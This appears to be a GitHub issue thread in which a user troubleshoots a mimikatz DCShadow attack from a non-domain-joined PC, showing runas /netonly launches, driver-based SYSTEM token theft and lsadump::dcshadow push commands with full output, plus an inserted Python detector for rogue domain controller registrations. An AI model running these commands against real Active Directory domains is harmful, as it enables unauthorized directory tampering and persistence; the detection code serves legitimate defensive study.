
Can't find way to run Mimikatz in context of a domain administrator on non-domain-joined PC for DC Shadow attack

Open rick-engle opened this issue 1 year ago • 8 comments

I'm looking for a way to launch mimikatz within the context of an AD domain administrator (DA) so that if I use the token::whoami command it shows me running in that context:

mimikatz # token::whoami

  • Process Token : {0;000003e7} 2 D 1443633 TARGETDOMAIN\ADMINUSER S-xxxxx (04g,30p) Primary
  • Thread Token : no token

The attack PC does have line of sight to a Domain Controller, but I can't figure out how I can start mimikatz in that DA context. Is there a way to do this?

Thanks.

rick-engle avatar Mar 16 '23 20:03 rick-engle

Uhh you try runas already?


picheljitsu avatar Mar 17 '23 00:03 picheljitsu

I did try that but unfortunately I get this error:

C:\temp>runas /user:mydomain.com\badadmin "C:\Attackfolder\x64\mimikatz.exe"
Enter the password for mydomain.com\badadmin:
Attempting to start C:\Attackfolder\x64\mimikatz.exe as user "mydomain.com\badadmin" ...
RUNAS ERROR: Unable to run - C:\Attackfolder\x64\mimikatz.exe
1787: The security database on the server does not have a computer account for this workstation trust relationship.

rick-engle avatar Mar 17 '23 14:03 rick-engle

/netonly

gentilkiwi avatar Mar 17 '23 14:03 gentilkiwi

Hi @gentilkiwi, that command works but doesn't seem to change the user context. If I use this it launches mimikatz OK, but the whoami still shows me in the context of the local admin account I signed into the Windows PC with:

runas /netonly /user:mydomain.com\badadmin "C:\Attackfolder\x64\mimikatz.exe"

mimikatz # token::whoami

  • Process Token : {0;0057a282} 2 L 5743378 ATTACKER-EXT\georgej S-1-5-21-3967830162-2019074872-1635380170-1000 (12g,05p) Primary
  • Thread Token : no token

rick-engle avatar Mar 17 '23 14:03 rick-engle

The netonly is ... network only. If all is ok, you'll see the correct user in a network capture, for example.

gentilkiwi avatar Mar 17 '23 14:03 gentilkiwi

Ok that is good to know. I put everything together for my DC Shadow attack (which I can get working fine on a domain-joined PC) but the first mimikatz session making an attribute change never receives the sync from session #2 making the push. I did turn off the Windows firewalls on this Windows 10 PC as I did on other domain-joined machines where this worked. I guessed at the parameters I needed for the lsadump::dcshadow /object and lsadump::dcshadow /push commands to enable them to find the domain controller. This attack PC DOES have line of sight to the domain controller:

Mimikatz session #1

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY gentilkiwi ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'   Vincent LE TOUX             ( [email protected] )
  '#####'    > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # !+
[+] 'mimidrv' service already registered
[*] 'mimidrv' service already started

mimikatz # !processtoken
Token from process 0 to process 0
  • from 0 will take SYSTEM token
  • to 0 will take all 'cmd' and 'mimikatz' process
Token from 4/System
  • to 4976/cmd.exe
  • to 5704/mimikatz.exe
  • to 2844/mimikatz.exe

mimikatz # lsadump::dcshadow /object:jeffl /dc:DC1.mydomain.com /attribute:Description /value="My new cool description is swell!"
** Domain Info **

Domain: DC=mydomain,DC=com
Configuration: CN=Configuration,DC=mydomain,DC=com
Schema: CN=Schema,CN=Configuration,DC=mydomain,DC=com
dsServiceName: ,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=mydomain,DC=com
domainControllerFunctionality: 6 ( WIN2012R2 )
highestCommittedUSN: 635132

** Server Info **

Server: DC1.mydomain.com
  InstanceId : {52021f09-72f2-4471-9114-9e582b9c071c}
  InvocationId: {254a564c-26b5-45cc-a01a-4774f80bab1a}
Fake Server (not already registered): ATTACKER-EXT.mydomain.com

** Attributes checking **

#0: Description

** Objects **

#0: jeffl
  DN:CN=JeffL,CN=Users,DC=mydomain,DC=com
  Description (2.5.4.13-d rev 1): My new cool description is swell!
  (4d00790020006e0065007700200063006f006f006c0020006400650073006300720069007000740069006f006e0020006900730020007300770065006c006c0021000000)

** Starting server **

BindString[0]: ncacn_ip_tcp:ATTACKER-EXT[53196]
RPC bind registered
RPC Server is waiting!
== Press Control+C to stop ==

Mimikatz session #2

Launch with: runas /netonly /user:mydomain.com\badadmin "C:\Attackfolder\x64\mimikatz.exe"

mimikatz # token::whoami
  • Process Token : {0;00630804} 2 L 6490326 ATTACKER-EXT\georgej S-1-5-21-3967830162-2019074872-1635380170-1000 (12g,05p) Primary
  • Thread Token : no token

mimikatz # lsadump::dcshadow /push
ERROR kull_m_net_getDC ; DsGetDcName: 1355

mimikatz # lsadump::dcshadow /push /dc:DC1.mydomain.com
** Domain Info **

Domain: DC=mydomain,DC=com
Configuration: CN=Configuration,DC=mydomain,DC=com
Schema: CN=Schema,CN=Configuration,DC=mydomain,DC=com
dsServiceName: ,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=mydomain,DC=com
domainControllerFunctionality: 6 ( WIN2012R2 )
highestCommittedUSN: 635133

** Server Info **

Server: DC1.mydomain.com
  InstanceId : {52021f09-72f2-4471-9114-9e582b9c071c}
  InvocationId: {254a564c-26b5-45cc-a01a-4774f80bab1a}
Fake Server (not already registered): ATTACKER-EXT.mydomain.com

** Performing Registration **

** Performing Push **

Syncing DC=mydomain,DC=com
Sync Done

** Performing Unregistration **

rick-engle avatar Mar 17 '23 14:03 rick-engle
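From the defender's side, the session output above shows the footprint a DCShadow push leaves in the Configuration partition: an NTDS Settings (nTDSDSA) object is registered under CN=Servers,CN=&lt;site&gt;,CN=Sites for a host that is not a real domain controller and is removed again moments later. The following is an added example, not code from this thread or from mimikatz: it flags that register-then-unregister pattern in constructed Security event records (5137 object created, 5141 object deleted); the known-DC inventory, the event field names and all sample values are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample records modelled on Windows Security events 5137 (directory
# service object created) and 5141 (object deleted). Field names follow the event
# XML; every value (names, DNs, timestamps) is made up for this example.
SITE = "CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=mydomain,DC=com"
SAMPLE_EVENTS = [
    # Short-lived registration from a workstation: created, used, deleted seconds later.
    {"EventID": 5137, "TimeCreated": "2023-03-17T14:40:01", "SubjectUserName": "badadmin",
     "ObjectClass": "nTDSDSA", "ObjectDN": f"CN=NTDS Settings,CN=ATTACKER-EXT,{SITE}"},
    {"EventID": 5141, "TimeCreated": "2023-03-17T14:40:03", "SubjectUserName": "badadmin",
     "ObjectClass": "nTDSDSA", "ObjectDN": f"CN=NTDS Settings,CN=ATTACKER-EXT,{SITE}"},
    # Benign: a real DC promotion whose nTDSDSA object stays in place.
    {"EventID": 5137, "TimeCreated": "2023-03-10T09:00:00", "SubjectUserName": "DC2$",
     "ObjectClass": "nTDSDSA", "ObjectDN": f"CN=NTDS Settings,CN=DC2,{SITE}"},
]

# Inventory of legitimate DCs (assumed here; in practice pull it from the domain).
KNOWN_DCS = {"DC1", "DC2"}
NTDS_RE = re.compile(
    r"^CN=NTDS Settings,CN=(?P<server>[^,]+),CN=Servers,.*,CN=Sites,CN=Configuration,", re.I)

def server_from_dn(dn):
    """Server name if dn is an NTDS Settings object under Sites, else None."""
    m = NTDS_RE.match(dn)
    return m.group("server") if m else None

def find_rogue_dc_registrations(events, known_dcs=KNOWN_DCS, window=timedelta(minutes=10)):
    """Flag nTDSDSA objects for hosts that are not known DCs or that vanish within `window`."""
    created, deleted = {}, {}
    for e in events:
        srv = server_from_dn(e["ObjectDN"]) if e["ObjectClass"].lower() == "ntdsdsa" else None
        if srv is None:
            continue
        when = datetime.fromisoformat(e["TimeCreated"])
        if e["EventID"] == 5137:
            created[srv] = (when, e["SubjectUserName"])
        elif e["EventID"] == 5141:
            deleted[srv] = when
    known = {d.upper() for d in known_dcs}
    alerts = []
    for srv, (when, who) in created.items():
        reasons = []
        if srv.upper() not in known:
            reasons.append("NTDS Settings created for a host that is not a known DC")
        if srv in deleted and timedelta(0) <= deleted[srv] - when <= window:
            reasons.append(f"object deleted again after {int((deleted[srv] - when).total_seconds())}s")
        if reasons:
            alerts.append({"server": srv, "by": who, "reasons": reasons})
    return alerts
```

Events 5137/5141 are only emitted when Directory Service Changes auditing is enabled and a SACL covers the Configuration partition, so check that before relying on this. A real deployment would replace KNOWN_DCS with a live query of the domain's DC list rather than a hard-coded set.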

Are you in a virtualized environment or attached to multiple networks? Also, have you dumped dns traffic to see what’s going on?


picheljitsu avatar Mar 18 '23 23:03 picheljitsu

Reading through this, it seems like you are having network issues, because I can't imagine this not being related to some type of network issue.

bbhorrigan avatar Apr 25 '23 01:04 bbhorrigan